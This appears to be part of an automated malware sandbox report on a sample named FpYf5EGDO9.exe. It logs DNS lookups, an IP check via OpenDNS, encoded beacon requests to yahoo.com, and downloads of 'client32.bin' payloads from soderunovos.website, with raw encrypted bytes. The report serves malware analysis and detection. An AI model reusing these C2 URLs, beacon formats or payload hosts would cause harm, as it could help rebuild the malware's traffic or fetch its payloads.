Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.707777977 CET	208.67.222.222	192.168.2.3	0x2	No error (0)	myip.opendns.com		84.17.52.63	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:37.355216980 CET	8.8.8.8	192.168.2.3	0x3485	No error (0)	lycos.com		209.202.254.90	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:38.476181984 CET	8.8.8.8	192.168.2.3	0xa124	No error (0)	www.lycos.com		209.202.254.90	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	mail.yahoo.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.686436892 CET	8.8.8.8	192.168.2.3	0x4667	No error (0)	login.yahoo.com	ds-ats.member.g02.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 21:01:39.686436892 CET	8.8.8.8	192.168.2.3	0x4667	No error (0)	ds-ats.member.g02.yahoodns.net		212.82.100.140	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yahoo.com

www.yahoo.com

soderunovos.website

lycos.com

www.lycos.com

mail.yahoo.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	74.6.143.26	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:01 UTC	0	OUT	GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 19:59:01 UTC	0	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Nov 2021 19:59:01 GMT Connection: keep-alive Strict-Transport-Security: max-age=31536000 Server: ATS Cache-Control: no-store, no-cache Content-Type: text/html Content-Language: en X-Frame-Options: SAMEORIGIN Set-Cookie: B=emaekhlgpqi05&b=3&s=ke; expires=Wed, 23-Nov-2022 19:59:01 GMT; path=/; domain=.yahoo.com Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw Content-Length: 8
2021-11-23 19:59:01 UTC	1	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	87.248.100.216	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:02 UTC	1	OUT	GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Connection: Keep-Alive Cache-Control: no-cache Host: www.yahoo.com Cookie: B=emaekhlgpqi05&b=3&s=ke
2021-11-23 19:59:02 UTC	1	IN	HTTP/1.1 404 Not Found date: Tue, 23 Nov 2021 19:59:01 GMT p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" cache-control: private x-content-type-options: nosniff content-type: text/html; charset=UTF-8 x-envoy-upstream-service-time: 14 server: ATS Content-Length: 1052 Age: 1 Connection: close Strict-Transport-Security: max-age=31536000 Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=; X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block
2021-11-23 19:59:02 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 42 3d 65 6d 61 65 6b 68 6c 67 70 71 69 30 35 26 62 3d 33 26 73 3d 6b 65 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 32 34 20 4e 6f 76 20 32 30 32 32 20 30 31 3a 35 39 3a 30 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 35 37 36 30 30 3b 20 44 6f 6d 61 69 6e 3d 2e 79 61 68 6f 6f 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 0d 0a 45 78 70 65 63 74 2d 43 54 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 2c 20 72 65 70 6f 72 74 2d 75 72 69 3d 22 68 74 74 70 3a 2f 2f 63 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2f 63 73 70 3f 73 72 63 3d 79 61 68 6f 6f 63 6f 6d 2d 65 78 70 65 63 74 2d 63 74 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 22 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 Data Ascii: Set-Cookie: B=emaekhlgpqi05&b=3&s=ke; Expires=Thu, 24 Nov 2022 01:59:02 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"Referrer-Policy: no-ref
2021-11-23 19:59:02 UTC	3	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 75 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 3f 65 72 72 3d 34 30 34 26 65 72 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 66 6a 64 72 61 77 25 32 66 48 48 41 51 34 35 37 42 30 47 74 4c 73 6b 4c 6b 76 25 32 66 5a 69 7a 68 39 54 74 68 68 63 50 63 25 32 66 78 54 30 69 53 33 51 6a 6c 37 79 25 32 66 6b 70 48 30 4d 71 43 34 64 73 7a 42 33 48 25 32 66 48 57 6d 6a 48 75 52 54 66 41 4c 4b 71 63 71 4b 48 4c 65 35 68 25 32 66 35 4b 41 6e 66 4f 53 34 69 5f 32 42 4c 56 69 37 25 32 66 32 4c 36 34 75 35 78 77 76 54 66 33 73 58 70 25 32 66 55 72 4c 6f 65 Data Ascii: <html><meta charset='utf-8'><script>var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoe

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49751	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:22 UTC	4	OUT	GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 19:59:22 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:01 GMT Content-Type: application/zip Content-Length: 178766 Connection: close X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; path=/; domain=.soderunovos.website Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: lang=en; expires=Thu, 23-Dec-2021 12:20:01 GMT; path=/ Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-11-23 19:59:22 UTC	5	IN	Data Raw: 82 b5 80 2c 9d 00 a1 1a f2 32 12 e4 6f 8f b9 7c a1 75 05 3d c3 95 5b b7 8e ec c4 1d ac 3f 66 f4 84 4a 64 2f 5d 0f 27 92 9d 18 f5 19 1d 5a 08 b3 52 b6 35 53 79 36 3a e2 99 33 c1 40 f7 10 09 16 86 bc 84 a4 ae f6 c2 d7 88 a9 5a a3 42 f9 88 cc 99 44 47 c4 ec 3c e3 95 ad 46 fd 35 c8 0d 6e f6 51 58 30 d7 05 52 19 17 13 dd 4b cd 6f 88 37 66 c5 1e 29 f6 c9 17 e0 c7 2b 94 e9 3f c4 63 a0 3e 2e 18 d0 95 62 5f 0b 00 dd eb 0b c3 10 76 1a 97 05 11 b5 74 b5 17 1d 94 35 50 7f 67 43 bd c3 54 5a 83 6f 34 fa c0 46 89 d3 31 c6 ca 9a d4 48 a6 2d 29 40 30 36 40 58 10 4f dc be 5b 5b 5c 67 3c c9 2a 25 68 ea 75 95 9d 48 d3 67 eb 1e 87 79 0c 5a 74 ea f9 6e fa 56 44 52 0e 43 93 eb 16 1f bd 92 05 62 ad 1a 8a cd 91 c4 84 1b 99 f0 6b 08 2d 4c 27 59 71 74 e2 e0 03 9e ab 31 14 5a da 1a Data Ascii: ,2o\|u=[?fJd/]'ZR5Sy6:3@ZBDG<F5nQX0RKo7f)+?c>.b_vt5PgCTZo4F1H-)@06@XO[[\g<*%huHgyZtnVDRCbk-L'Yqt1Z
2021-11-23 19:59:22 UTC	20	IN	Data Raw: 99 b0 0e 30 b1 22 5b 58 68 03 2d 9d 8d 66 11 e6 b2 c0 a8 ee 4f 44 cb 4c 7f 5b ff 5e 9b 7c 98 95 d2 80 18 91 9f b0 81 07 2d 81 4e a9 a1 e1 7d c5 e3 cb 6d 65 61 93 3c 30 cb 0e 50 0d 4d d1 4d 21 b8 ec 5d 77 0f 28 66 f7 9a 67 4a 51 cf e8 62 82 59 92 dc 85 64 2a 42 4c 31 7c 1c 78 7f ae 21 8b 21 1b b8 c8 99 21 02 f0 08 5c 9c 38 b3 fe 53 28 20 f7 de 96 65 9d b9 85 e3 34 5e e4 08 18 aa b9 47 49 b1 ae b3 8a 46 e2 30 bb 3d ca 49 15 e8 8d 77 54 9f 5f ef fd f6 fb f0 92 c3 0f 05 a6 c9 4c 26 71 d8 3a 37 71 98 9b 98 de 03 e3 3a be 6b af b6 b1 40 ae 7d 93 c0 8c 0f f5 72 03 73 f5 75 4a ea 9a f2 bc 04 31 a0 b7 92 a7 a3 17 20 16 ba 20 63 1f 5d ea 4f a4 d4 29 dc 90 d6 b4 bb d9 3b d7 8b f4 3f b4 a4 da 7e d0 52 c5 d4 ec 30 10 11 6c 21 5b 94 fb 60 ee 5e 44 d5 59 9b 3a be c8 b7 Data Ascii: 0"[Xh-fODL[^\|-N}mea<0PMM!]w(fgJQbYd*BL1\|x!!!\8S( e4^GIF0=IwT_L&q:7q:k@}rsuJ1 c]O);?~R0l![`^DY:
2021-11-23 19:59:23 UTC	36	IN	Data Raw: 1a ae c6 d5 9a 94 5a e1 3a f8 aa d2 fd 16 12 aa 29 4a e0 1e bf 4c e5 c6 e5 be 4f 00 de 81 19 19 72 57 40 28 04 da da db e4 f2 1f 60 a8 46 db ac 9b c7 1b 87 28 62 74 7d c7 da 2d 34 db 12 5d f8 a4 89 47 13 ea c8 9e 83 29 de 02 9f 7c 5e 74 0b 4b 10 2d e9 c6 03 60 c4 e8 98 f0 74 dc d3 b7 4d 58 1c c6 12 80 7c 64 3e fd 89 5e 7f 75 79 6a 3e 96 0b c3 84 f6 e2 5a 84 60 75 ec 9d 4e 69 84 11 e0 4a 4b a8 07 0a 0f d0 25 bb fc 2d a4 17 32 e1 6e 73 90 68 8b 8d 8e a1 ce 00 6b dd 95 0d ef b0 ed cb 19 2d ee 31 45 66 47 ba a0 04 47 c4 f8 46 49 29 94 ca 21 61 be 86 f5 30 59 b9 7e da ee 13 d2 7a 67 f6 15 ee ea 3e 68 e7 50 55 13 13 9b aa 67 ec 90 75 e5 60 96 9d b1 0c 6b 5c 29 de 60 52 a2 88 df 27 92 c9 43 9a d2 0f 7c 8d 77 ee e6 1e 6b 3a bc 31 5b 45 07 28 6e 53 43 bc a4 1c 65 Data Ascii: Z:)JLOrW@(`F(bt}-4]G)\|^tK-`tMX\|d>^uyj>Z`uNiJK%-2nshk-1EfGGFI)!a0Y~zg>hPUgu`k\)`R'C\|wk:1[E(nSCe
2021-11-23 19:59:23 UTC	52	IN	Data Raw: e9 1c d5 eb 36 99 17 9e 7c 67 fe f4 01 75 87 36 67 51 d5 ae 5a 81 65 9c 5e 9e 9e 45 da de c9 7c 34 87 35 eb 11 e4 6c 50 9c 76 17 68 6c ac 49 15 94 a4 ff 73 9b 4d a0 62 3f 68 85 4c 83 a2 68 d8 83 2b b3 56 38 62 28 91 a5 8d 2d c8 dc 52 4d a8 73 87 94 88 90 45 cd 17 75 c8 33 73 63 dc a9 ab f7 45 2b 34 1b a0 1c f1 51 1a cf e3 4e 51 23 1d bf 1f e9 ed 39 e3 08 bc ea 81 53 ea ef 4c 33 df 8a 2c bf 20 dc ac 6f 34 60 de c3 a1 65 a0 04 cc b9 3c 34 ad 44 27 a5 35 18 24 37 8d 5a 64 d7 70 fc bf 75 ac fb ea 7d 2d 26 c2 dc 5e c0 eb 92 59 3b 85 e8 53 6a c4 34 c5 d6 35 fc ec 3d 6c 97 90 aa 3b 28 c6 74 8c 89 03 a3 4d f2 e9 57 61 92 a2 bd fd a0 44 23 51 5f aa 7d 6f b7 07 da 79 d8 7a 26 54 cd 51 1c 87 ae d0 31 45 7f 7b 5c 91 9c 15 74 59 7e ce 7c ea 8b 63 52 53 34 9e fc d4 87 Data Ascii: 6\|gu6gQZe^E\|45lPvhlIsMb?hLh+V8b(-RMsEu3scE+4QNQ#9SL3, o4`e<4D'5$7Zdpu}-&^Y;Sj45=l;(tMWaD#Q_}oyz&TQ1E{\tY~\|cRS4
2021-11-23 19:59:23 UTC	68	IN	Data Raw: 95 4f 3a f4 97 61 39 28 5c 1d 24 30 8c de e6 c5 16 cd 7d a4 db d9 07 1f 28 28 38 9a 95 0d 13 82 86 12 6b a6 71 0c 50 bc c5 1d e1 ba 2e a2 d1 d1 5b e5 c4 af 57 75 c6 f5 8c 52 3e 16 54 43 02 2b 89 39 ca ff eb d6 b3 1e a1 c4 a0 56 e6 1d 60 59 77 ed 9e 2c 0a e8 b0 6d 23 21 e1 2b b0 9d 66 f8 d1 b2 0d 49 34 1c 83 61 16 1d 30 08 32 d2 11 85 96 1c 92 e5 84 d7 0a e2 78 5d b6 83 4d 9c 5d 22 a7 18 99 ea 97 1e 32 6c 00 8e b4 7f 9e 94 10 59 f0 a6 9f ce 2c 48 95 9b c1 39 ac 9a ec f3 67 c1 b1 14 6a e4 3f aa 73 0a 4c d7 38 ef 0d c1 d1 37 f1 e4 21 52 d6 7b dd 3e fd ff 57 56 05 64 16 6e 32 9a a8 66 0c 4e 6e ac 7f fa 65 fe cf ab 16 c5 90 02 23 1c 68 30 4d 04 b2 b5 2e a6 8a 67 d5 a1 f0 78 80 c7 b9 11 05 8b 3b f1 06 9a 49 86 75 9c c1 c0 10 71 91 ae 4e 66 cf 0a 67 1b aa 16 a4 Data Ascii: O:a9(\$0}((8kqP.[WuR>TC+9V`Yw,m#!+fI4a02x]M]"2lY,H9gj?sL87!R{>WVdn2fNne#h0M.gx;IuqNfg
2021-11-23 19:59:23 UTC	84	IN	Data Raw: 62 22 97 34 b0 ee 66 36 cf 22 18 04 67 c8 74 1a d8 94 3a 19 8b 14 93 d2 5b 69 eb 02 98 98 1a 01 48 88 ef ab 09 67 c2 11 54 c4 69 55 0f ab 3e 0a d1 d6 87 6a d7 7a ee ac 19 ac fb 3f 16 68 f8 c4 ff d2 be 24 30 e8 88 a8 7b 7b 43 73 a5 ca 73 58 fc c3 70 e2 eb 71 4a e4 1d 72 63 bb c3 95 ea 41 ca b7 19 2e 71 b8 aa 8c 51 dc 84 1b 04 3d 05 a5 d5 94 7a ca ae 19 74 9e 33 34 cb 50 e4 71 ba b4 d9 b0 6e 9e 50 fb 5c 9c b1 db 12 1b 11 ee cb c2 27 cc ad da 18 3f 85 cb 1f a8 39 90 5b 8d aa 29 4c fc bb 6a 8c 9e f5 bb 08 4d 2d 5a ac 5b b7 8b c4 ad 00 23 98 81 31 da dc 61 90 c7 a5 36 28 d6 68 2a 11 80 5e 07 63 26 c8 ac 2b 84 8f 3d 1a 3e bf d9 52 a4 b4 d0 4a 9d e1 a8 e5 40 2a ea 81 6b 03 e6 0b cf 63 29 a1 87 e5 3c db 60 fe b7 1a 6f 19 e6 f3 08 c4 ab 39 fb 0e 45 4d cd 5e 98 1a Data Ascii: b"4f6"gt:[iHgTiU>jz?h$0{{CssXpqJrcA.qQ=zt34PqnP\'?9[)LjM-Z[#1a6(h^c&+=>RJ@kc)<`o9EM^
2021-11-23 19:59:23 UTC	100	IN	Data Raw: 16 d9 5e d3 aa b4 ec e0 c1 4a 4b fa f6 20 f6 b0 01 21 67 52 a9 bc b4 80 39 3b 63 da b3 27 3e 87 ff de 0a 29 d7 b2 21 34 7e 77 76 d9 8f bf ef f3 0c c5 e5 9c 39 a7 20 16 59 3b d4 64 13 93 03 13 41 30 ad 65 fe c6 b6 52 c7 42 3f 2d 4b c4 21 8a b5 f7 74 86 e9 9a 3a 9b ce 0a 7b b8 46 2e d4 be 7e 87 85 27 48 2a ff 9e 62 c1 e1 81 da 9b c8 32 44 e8 a9 14 99 c8 0d 6a ac c5 4c 15 24 c7 cd 4f f4 91 ab 29 da 7a c7 a4 96 41 36 bc 3d 04 74 74 fe 93 ef 87 dc 52 73 d4 47 60 6f ca 11 bd b3 5e 46 66 66 a7 f0 f8 23 75 31 0b f7 dd 7a df 7a 26 32 00 51 c6 a2 f5 f2 cd b6 81 f1 2b b3 3a 3c b0 86 b9 e0 a5 8e 44 49 9e 1f 93 9e 21 fc 28 b5 46 e6 50 61 34 d5 d4 83 14 d7 99 aa 71 f5 3d e1 3a 0b 91 96 3e b4 02 2b 4a a8 f7 b5 26 2b ee 71 18 ae 0f 2a 16 cd 7b d8 84 b9 e3 f5 fc 4c 95 01 Data Ascii: ^JK !gR9;c'>)!4~wv9 Y;dA0eRB?-K!t:{F.~'Hb2DjL$O)zA6=ttRsG`o^Fff#u1zz&2Q+:<DI!(FPa4q=:>+J&+q{L
2021-11-23 19:59:23 UTC	116	IN	Data Raw: 75 f6 50 ec 63 bb 17 40 2d 74 1e 4e d2 8a f2 7b dd 35 d8 38 0a 2a 74 bd 29 96 97 f8 82 f5 45 cb 0c 6c b6 39 89 90 0a 76 10 f0 43 73 3e 54 b5 80 ff 09 73 7f c3 3d 3f 59 71 51 e2 20 52 76 e9 a7 3f dd 7d 4c a3 42 ef 96 ec 6e a4 f4 40 a1 de 08 5b 1a 68 86 f3 0c c2 c5 f2 65 92 99 a0 16 88 1f f7 07 e1 a3 8c 97 83 76 4d d8 39 72 98 a8 82 41 01 d7 0d 3e 95 b7 ee 04 bb d3 8f 23 66 80 0f a0 7c a0 2d 6f d5 bf 71 3c 47 5d ad 7b f7 e0 fd ac a9 22 9a 11 ff a3 db 11 1d 05 82 9f 48 04 df 3f 49 63 82 3a 76 77 17 34 da 9b 97 60 14 3f f9 fb d1 e9 e7 23 ee f6 89 e3 b3 ba 7b 1a 3c 98 e5 74 8b 20 03 ed 11 24 26 55 04 1e e6 6a 7c f7 b1 7f f0 26 be 6c 02 c2 43 6b c4 59 f4 01 8f 4b 33 9b f7 05 82 22 bd 80 fb cd bd d0 de 30 d7 54 97 73 b1 1d 77 57 a6 1c 3c 83 c8 81 8f 92 dd ca 44 Data Ascii: uPc@-tN{58*t)El9vCs>Ts=?YqQ Rv?}LBn@[hevM9rA>#f\|-oq<G]{"H?Ic:vw4`?#{<t $&Uj\|&lCkYK3"0TswW<D
2021-11-23 19:59:23 UTC	132	IN	Data Raw: b6 af cd dc 93 6d 7e f1 1e b8 de b4 d3 97 7a b3 23 4a d5 e6 7f 83 d2 b3 44 30 56 33 28 bf 14 58 7c 15 0f 07 0b c1 ec e2 46 f3 ac 5b 90 66 f8 d3 f3 3a 0d 63 b2 1a 8e 5d 45 58 20 dd 7d 64 8a 82 71 1e 37 d2 78 e3 4c 90 88 52 96 a7 2d 92 7e bc 78 c7 72 30 24 ac 5b 93 a1 f6 f9 a1 46 b4 7e 64 a9 3a 90 ab ca 14 3b bf d1 89 9c 08 e4 ca ac 99 a9 ef 13 13 8d 4a 04 a1 bd ac a4 24 4e 8d 09 87 d4 87 77 19 8c 4c d2 20 96 d5 98 c6 28 bb a1 b7 df 25 02 53 0f bd 3c 40 fb f6 fc 90 e7 68 8d 0f 2f 2d c8 cc 51 f7 44 df ef 7b d2 40 cd e9 01 49 99 21 bf 07 c0 d7 7c a1 0f 41 6c 10 2f e7 3a 3f 49 83 99 b0 ab 3c b7 2e 2c 5d 4e ca 77 a5 f0 fe 1e 34 8d 0c cb 68 c0 7a 37 fe 8d 17 bd 62 d0 26 09 c4 fc dd 69 eb 9c a8 f1 dc f1 f3 3b b1 48 c7 c4 b6 4d 09 49 05 ad e2 02 f2 e0 b9 c7 a7 3c Data Ascii: m~z#JD0V3(X\|F[f:c]EX }dq7xLR-~xr0$[F~d:;J$NwL (%S<@h/-QD{@I!\|Al/:?I<.,]Nw4hz7b&i;HMI<
2021-11-23 19:59:23 UTC	148	IN	Data Raw: b7 31 95 64 7a 27 d8 8b 46 6f fc f2 d1 ec 23 31 ae 69 ff d8 a0 fa cf 00 fa c6 47 88 37 75 d6 9b 41 dc 10 85 eb df d5 5c 38 6c 8b 6b 3d a4 06 e2 6e 46 83 53 36 3e 18 77 3c 37 73 96 5e 31 7b 60 b3 53 a6 ea 79 e6 fb 30 e9 1e 7a bb e7 97 e1 0a 56 ba 9c 93 b2 83 b1 26 bf 33 2c d5 12 39 c8 c7 dd 53 d4 95 5f 50 cb cf 55 27 9c 85 42 7f 9e d0 c5 54 ff eb 51 17 c9 49 4f 3d 5a fb 27 bc 09 c0 40 8b ca fd ec d5 58 2e 5a 4c 03 11 a3 49 6d 0f 46 aa f9 cf 85 3f ea 69 2a 02 69 41 fd 3b 24 a5 2f e6 45 d5 55 21 2d 38 ed 09 44 90 9c 8f 22 8e 2f 93 ba 50 1d d0 0f 71 22 7b 52 22 dd 93 5e d4 74 01 27 22 37 3b 6c c8 e9 79 d7 4b 56 e4 23 15 2b b9 46 ea 27 d0 27 cc 6a 41 cb 89 4f 4d f1 b4 5d 14 bd 88 f9 bb fa 4d 5c c2 02 b0 2d 2a a4 00 f6 29 eb 65 be 44 73 7e e1 2c 57 97 6e 1e 4e Data Ascii: 1dz'Fo#1iG7uA\8lk=nFS6>w<7s^1{`Sy0zV&3,9S_PU'BTQIO=Z'@X.ZLImF?iiA;$/EU!-8D"/Pq"{R"^t'"7;lyKV#+F''jAOM]M\-)eDs~,WnN
2021-11-23 19:59:23 UTC	164	IN	Data Raw: 62 b0 f1 24 af 00 78 9e 8f fb fe e2 b7 cb d6 bc 91 48 65 87 bb ab c2 c7 15 7d 57 ec a3 92 10 70 24 da 0b 8d b2 f0 3d 31 50 9e 1e b4 26 09 f9 5c 6c 90 3e c3 56 74 a7 71 04 d4 d0 f8 97 a9 57 8e ad 79 2d ad 14 3a ed 32 64 51 2e 4e 08 e2 34 8c e0 32 7b 9b 93 50 8c 3e bf 28 90 59 87 7e 60 fe 5c bd 08 e0 40 d3 f6 87 45 13 5c 25 15 db cf 09 71 a0 e6 c1 86 db bd 37 ce 30 fc 50 da da a6 89 37 f8 f2 92 f1 eb ea e0 9d 90 d7 2b 20 0e 1f 82 43 17 69 7c bd 96 35 05 74 f2 a0 c1 eb b9 ae e5 01 4c 51 db e2 52 5e b2 ca 6c 54 2d bf 61 d2 2a 65 2d b0 ba 2b f5 87 b6 8f c9 cc fa 31 bb a1 df 28 d1 a3 43 c3 ba b5 5c 07 0b 27 d5 8f 4d 4b 2a 6b 46 b4 7b a4 0e 46 a7 6a 7a 7f 7c 5c 5a f9 77 a3 ef 32 32 a2 c0 e0 46 c8 5d f1 fb d0 72 99 19 15 9c a4 0f ca c7 92 a8 ac ec a9 30 e0 24 36 Data Ascii: b$xHe}Wp$=1P&\l>VtqWy-:2dQ.N42{P>(Y~`\@E\%q70P7+ Ci\|5tLQR^lT-ae-+1(C\'MKkF{Fjz\|\Zw22F]r0$6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49753	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:23 UTC	179	OUT	GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
2021-11-23 19:59:23 UTC	180	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:01 GMT Content-Type: application/zip Content-Length: 227905 Connection: close X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
